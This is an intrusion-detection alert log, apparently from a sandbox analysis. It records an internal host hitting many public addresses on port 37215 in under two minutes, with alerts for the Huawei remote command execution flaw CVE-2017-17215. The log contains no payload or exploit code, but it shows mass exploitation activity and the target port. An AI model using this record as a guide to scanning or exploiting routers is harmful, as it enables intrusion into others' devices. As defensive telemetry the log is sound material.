                                                        06/13/24-21:32:03.305300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492237215192.168.2.1441.52.60.11
                                                        06/13/24-21:33:05.015907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284637215192.168.2.1441.112.79.6
                                                        06/13/24-21:31:59.177063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974037215192.168.2.1441.31.170.60
                                                        06/13/24-21:32:11.508749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.14197.14.48.17
                                                        06/13/24-21:33:11.159969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842037215192.168.2.1441.46.211.155
                                                        06/13/24-21:32:03.277418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970637215192.168.2.14156.15.119.11
                                                        06/13/24-21:32:58.842774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235637215192.168.2.1441.110.169.112
                                                        06/13/24-21:31:59.176476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4011437215192.168.2.1441.165.223.247
                                                        06/13/24-21:31:59.174810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.1441.225.65.168
                                                        06/13/24-21:32:46.510238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.1441.110.23.245
                                                        06/13/24-21:32:28.025207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001437215192.168.2.1441.103.117.249
                                                        06/13/24-21:32:03.278149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068437215192.168.2.14197.11.150.37
                                                        06/13/24-21:32:46.510378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593637215192.168.2.14156.248.79.24
                                                        06/13/24-21:32:03.275546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742237215192.168.2.14197.44.145.47
                                                        06/13/24-21:33:07.041828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429237215192.168.2.14197.135.122.147
                                                        06/13/24-21:32:50.618109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643237215192.168.2.1441.211.172.83
                                                        06/13/24-21:33:15.253542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808037215192.168.2.1441.175.124.45
                                                        06/13/24-21:33:11.159660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562437215192.168.2.14156.46.109.173
                                                        06/13/24-21:32:42.403881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350037215192.168.2.14197.1.161.97
                                                        06/13/24-21:32:15.604408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424237215192.168.2.14156.94.155.98
                                                        06/13/24-21:32:38.303519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202437215192.168.2.1441.124.198.243
                                                        06/13/24-21:32:17.694743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353037215192.168.2.14197.103.144.113
                                                        06/13/24-21:32:01.248901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653837215192.168.2.14156.0.64.228
                                                        06/13/24-21:32:07.403109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310037215192.168.2.14197.32.90.123
                                                        06/13/24-21:32:01.221931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772037215192.168.2.14156.217.112.178
                                                        06/13/24-21:32:09.457500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491437215192.168.2.14197.39.183.198
                                                        06/13/24-21:33:11.173564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903237215192.168.2.14156.143.100.40
                                                        06/13/24-21:32:28.025319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525837215192.168.2.1441.228.248.177
                                                        06/13/24-21:31:57.131243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650637215192.168.2.14197.49.125.52
                                                        06/13/24-21:32:34.195573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540237215192.168.2.1441.73.119.55
                                                        06/13/24-21:32:50.610575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4011837215192.168.2.14156.183.247.73
                                                        06/13/24-21:33:09.109550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177637215192.168.2.1441.42.66.250
                                                        06/13/24-21:32:28.045248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435237215192.168.2.1441.93.139.187
                                                        06/13/24-21:33:00.887820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415637215192.168.2.14197.151.174.238
                                                        06/13/24-21:32:34.195522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030237215192.168.2.14197.184.135.58
                                                        06/13/24-21:32:48.549579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886637215192.168.2.14156.231.33.246
                                                        06/13/24-21:32:52.660111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.1441.238.96.36
                                                        06/13/24-21:32:56.755673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809837215192.168.2.14197.112.209.236
                                                        06/13/24-21:32:01.224553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.1441.253.146.254
                                                        06/13/24-21:32:25.993453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432837215192.168.2.1441.194.89.131
                                                        06/13/24-21:32:05.370797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411837215192.168.2.14197.97.13.212
                                                        06/13/24-21:32:01.241405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335437215192.168.2.14197.33.119.29
                                                        06/13/24-21:32:03.294458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797037215192.168.2.14197.128.125.18
                                                        06/13/24-21:32:07.403213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032837215192.168.2.14156.87.157.53
                                                        06/13/24-21:32:36.263595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189837215192.168.2.14156.62.181.27
                                                        06/13/24-21:32:01.220890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278237215192.168.2.1441.0.119.130
                                                        06/13/24-21:32:13.547443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.14156.149.192.244
                                                        06/13/24-21:32:15.633402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979237215192.168.2.14156.161.20.252
                                                        06/13/24-21:33:07.040652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14156.92.74.130
                                                        06/13/24-21:33:11.177191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552437215192.168.2.14197.205.55.111
                                                        06/13/24-21:32:19.730607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410837215192.168.2.14156.43.199.46
                                                        06/13/24-21:32:09.438750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164437215192.168.2.1441.103.122.120
                                                        06/13/24-21:33:17.307892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069037215192.168.2.1441.31.221.171
                                                        06/13/24-21:32:09.440516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028637215192.168.2.14197.33.83.216
                                                        06/13/24-21:33:02.912828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845837215192.168.2.14197.181.224.41
                                                        06/13/24-21:32:23.932698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890637215192.168.2.1441.248.48.140
                                                        06/13/24-21:33:17.338721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439037215192.168.2.1441.216.69.246
                                                        06/13/24-21:32:42.404567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967437215192.168.2.1441.23.212.211
                                                        06/13/24-21:32:28.028848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184637215192.168.2.14156.44.42.203
                                                        06/13/24-21:32:52.676646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983837215192.168.2.1441.60.112.66
                                                        06/13/24-21:33:00.869936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753037215192.168.2.1441.206.90.216
                                                        06/13/24-21:32:48.569597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102237215192.168.2.14156.10.46.222
                                                        06/13/24-21:32:46.502448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951637215192.168.2.1441.193.205.201
                                                        06/13/24-21:32:30.126206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768237215192.168.2.1441.218.26.122
                                                        06/13/24-21:32:36.267622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861637215192.168.2.14197.130.36.136
                                                        06/13/24-21:32:32.169767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3461037215192.168.2.14156.65.114.92
                                                        06/13/24-21:33:04.992278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423037215192.168.2.1441.185.70.48
                                                        06/13/24-21:32:54.707929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.14156.163.164.31
                                                        06/13/24-21:32:07.417065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.1441.170.93.165
                                                        06/13/24-21:32:58.822139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.14197.140.227.124
                                                        06/13/24-21:32:01.220656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487837215192.168.2.14197.57.79.65
                                                        06/13/24-21:32:19.751864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109437215192.168.2.14197.212.181.28
                                                        06/13/24-21:33:00.869128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.14197.90.88.15
                                                        06/13/24-21:33:07.039609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399237215192.168.2.14197.55.162.159
                                                        06/13/24-21:32:48.570053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.14156.56.95.245
                                                        06/13/24-21:32:52.656357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513437215192.168.2.1441.211.76.79
                                                        06/13/24-21:32:11.506447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193637215192.168.2.14197.211.168.205
                                                        06/13/24-21:32:40.379739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346837215192.168.2.14156.218.105.224
                                                        06/13/24-21:32:50.611650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.14156.255.20.87
                                                        06/13/24-21:32:28.043736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627837215192.168.2.1441.147.128.207
                                                        06/13/24-21:32:58.824552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038637215192.168.2.14197.45.54.25
                                                        06/13/24-21:32:01.219503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007037215192.168.2.1441.116.218.225
                                                        06/13/24-21:32:21.786364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568637215192.168.2.14156.140.57.241
                                                        06/13/24-21:32:48.567605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550837215192.168.2.1441.93.136.231
                                                        06/13/24-21:31:57.092859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.1441.92.140.216
                                                        06/13/24-21:32:21.783633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849637215192.168.2.14197.28.235.148
                                                        06/13/24-21:33:00.871651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236437215192.168.2.14156.169.248.24
                                                        06/13/24-21:32:52.658332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897837215192.168.2.14197.200.33.72
                                                        06/13/24-21:33:11.180214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050237215192.168.2.14156.254.230.53
                                                        06/13/24-21:32:36.246570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010037215192.168.2.14156.62.63.118
                                                        06/13/24-21:32:56.759307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876437215192.168.2.14197.174.186.164
                                                        06/13/24-21:32:15.608435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633237215192.168.2.14156.151.237.168
                                                        06/13/24-21:32:17.696269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.14156.136.77.48
                                                        06/13/24-21:33:11.176264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438437215192.168.2.14156.45.10.198
                                                        06/13/24-21:32:17.674487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.1441.146.4.239
                                                        06/13/24-21:32:17.677031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816237215192.168.2.1441.153.45.160
                                                        06/13/24-21:32:15.629333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196837215192.168.2.14156.226.184.14
                                                        06/13/24-21:32:01.248243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.14197.198.3.212
                                                        06/13/24-21:32:07.415920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749237215192.168.2.14156.219.134.98
                                                        06/13/24-21:32:15.632464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.1441.173.152.169
                                                        06/13/24-21:33:00.887378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683037215192.168.2.14197.234.212.67
                                                        06/13/24-21:32:01.247605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694037215192.168.2.1441.135.217.207
                                                        06/13/24-21:32:50.612129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711637215192.168.2.14197.137.226.6
                                                        06/13/24-21:33:17.306730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997237215192.168.2.14197.16.0.121
                                                        06/13/24-21:32:13.546039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818837215192.168.2.14156.75.40.150
                                                        06/13/24-21:31:57.131350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668837215192.168.2.1441.128.149.86
                                                        06/13/24-21:31:59.177887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536237215192.168.2.14197.232.150.242
                                                        06/13/24-21:32:46.503280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920437215192.168.2.1441.164.25.103
                                                        06/13/24-21:32:19.729852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628437215192.168.2.14156.214.222.74
                                                        06/13/24-21:32:46.509868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744837215192.168.2.14156.10.214.241
                                                        06/13/24-21:31:57.153133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387837215192.168.2.14156.170.117.106
                                                        06/13/24-21:32:40.358139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866837215192.168.2.14197.157.9.137
                                                        06/13/24-21:33:07.055796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311637215192.168.2.14197.107.9.131
                                                        06/13/24-21:32:09.438941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357637215192.168.2.14197.102.143.56
                                                        06/13/24-21:32:15.634555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.14197.82.233.20
                                                        06/13/24-21:32:54.726578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801037215192.168.2.1441.35.165.69
                                                        06/13/24-21:32:21.784265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990037215192.168.2.14156.244.114.131
                                                        06/13/24-21:32:32.170917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052837215192.168.2.1441.227.77.208
                                                        06/13/24-21:33:02.936119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017237215192.168.2.14197.119.241.144
                                                        06/13/24-21:33:02.950146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306437215192.168.2.1441.71.212.244
                                                        06/13/24-21:33:04.991001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530637215192.168.2.14197.8.134.186
                                                        06/13/24-21:33:00.887769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381037215192.168.2.14197.242.113.4
                                                        06/13/24-21:32:11.488777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802437215192.168.2.14197.210.62.221
                                                        06/13/24-21:32:46.527965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775837215192.168.2.14156.51.88.235
                                                        06/13/24-21:33:07.039570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942637215192.168.2.1441.25.105.165
                                                        06/13/24-21:33:00.867672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582437215192.168.2.14197.8.156.10
                                                        06/13/24-21:33:07.058461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087637215192.168.2.14197.127.154.130
                                                        06/13/24-21:32:38.300615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716837215192.168.2.1441.50.81.114
                                                        06/13/24-21:32:07.404235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861437215192.168.2.1441.103.130.201
                                                        06/13/24-21:32:42.406087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197437215192.168.2.14197.240.25.67
                                                        06/13/24-21:33:04.994260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353437215192.168.2.14197.74.45.81
                                                        06/13/24-21:33:17.309844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027637215192.168.2.1441.104.83.157
                                                        06/13/24-21:32:30.091820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896837215192.168.2.14156.126.86.165
                                                        06/13/24-21:32:42.409002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582637215192.168.2.14197.193.203.35
                                                        06/13/24-21:32:13.564239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975237215192.168.2.14197.151.47.114
                                                        06/13/24-21:33:07.042778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915037215192.168.2.14197.108.145.156
                                                        06/13/24-21:33:15.254035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532637215192.168.2.1441.66.119.27
                                                        06/13/24-21:33:09.112174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.1441.193.197.157
                                                        06/13/24-21:32:25.973710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377837215192.168.2.14197.63.75.87
                                                        06/13/24-21:32:30.098631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678437215192.168.2.14197.17.80.25
                                                        06/13/24-21:32:46.523779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822837215192.168.2.14197.26.204.249
                                                        06/13/24-21:32:54.726634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839837215192.168.2.1441.239.29.191
                                                        06/13/24-21:32:56.755698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770037215192.168.2.14197.241.83.36
                                                        06/13/24-21:32:30.078537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244837215192.168.2.14197.195.202.250
                                                        06/13/24-21:32:50.611281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249837215192.168.2.1441.1.29.22
                                                        06/13/24-21:33:11.175471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595637215192.168.2.1441.246.238.148
                                                        06/13/24-21:32:54.724563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527037215192.168.2.14197.229.37.83
                                                        06/13/24-21:33:04.990606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862037215192.168.2.14156.82.25.150
                                                        06/13/24-21:33:11.180448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612637215192.168.2.14156.153.131.26
                                                        06/13/24-21:31:59.175752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777037215192.168.2.14197.82.75.9
                                                        06/13/24-21:31:59.175884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020037215192.168.2.1441.23.35.41
                                                        06/13/24-21:32:46.528194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549837215192.168.2.14156.20.45.211
                                                        06/13/24-21:32:01.241147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785437215192.168.2.1441.204.218.121
                                                        06/13/24-21:32:32.168882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372837215192.168.2.1441.50.174.33
                                                        06/13/24-21:32:30.079592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100837215192.168.2.14156.140.237.117
                                                        06/13/24-21:33:04.987385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851637215192.168.2.1441.105.250.45
                                                        06/13/24-21:33:11.156569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277437215192.168.2.14197.212.11.49
                                                        06/13/24-21:32:32.169994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141437215192.168.2.14156.30.147.91
                                                        06/13/24-21:32:32.156467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898237215192.168.2.1441.181.136.251
                                                        06/13/24-21:32:19.751359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979237215192.168.2.1441.172.193.34
                                                        06/13/24-21:33:09.109838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448037215192.168.2.14197.221.148.18
                                                        06/13/24-21:33:07.055392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571437215192.168.2.14156.208.119.11
                                                        06/13/24-21:32:48.555596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209237215192.168.2.1441.235.227.100
                                                        06/13/24-21:32:15.633777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408437215192.168.2.1441.45.246.9
                                                        06/13/24-21:32:42.422316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471237215192.168.2.1441.90.104.86
                                                        06/13/24-21:32:11.506404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314837215192.168.2.1441.214.113.148
                                                        06/13/24-21:33:00.889334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013637215192.168.2.14197.131.58.0
                                                        06/13/24-21:31:57.091813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.14156.200.181.229
                                                        06/13/24-21:32:52.658463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.14197.98.171.242
                                                        06/13/24-21:32:01.248367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465037215192.168.2.14156.170.23.95
                                                        06/13/24-21:32:09.439590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019837215192.168.2.1441.233.76.20
                                                        06/13/24-21:32:09.458123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636037215192.168.2.14156.65.0.167
                                                        06/13/24-21:32:15.629752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652637215192.168.2.1441.12.220.132
                                                        06/13/24-21:32:54.724457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140837215192.168.2.1441.250.211.64
                                                        06/13/24-21:32:42.422547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074437215192.168.2.14156.172.240.202
                                                        06/13/24-21:32:36.248633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125237215192.168.2.1441.22.134.81
                                                        06/13/24-21:32:07.416242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311437215192.168.2.1441.89.230.241
                                                        06/13/24-21:32:52.657624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864837215192.168.2.14156.82.215.182
                                                        06/13/24-21:32:25.986642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493237215192.168.2.1441.125.181.128
                                                        06/13/24-21:33:02.949872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917037215192.168.2.14156.168.228.180
                                                        06/13/24-21:32:28.025516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511437215192.168.2.14156.114.211.55
                                                        06/13/24-21:33:11.160909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726237215192.168.2.1441.69.138.154
                                                        06/13/24-21:32:01.224013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538037215192.168.2.14156.15.57.226
                                                        06/13/24-21:31:57.131692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152437215192.168.2.14197.226.89.160
                                                        06/13/24-21:31:59.196183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333637215192.168.2.1441.219.126.242
                                                        06/13/24-21:32:54.709713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349037215192.168.2.1441.214.246.84
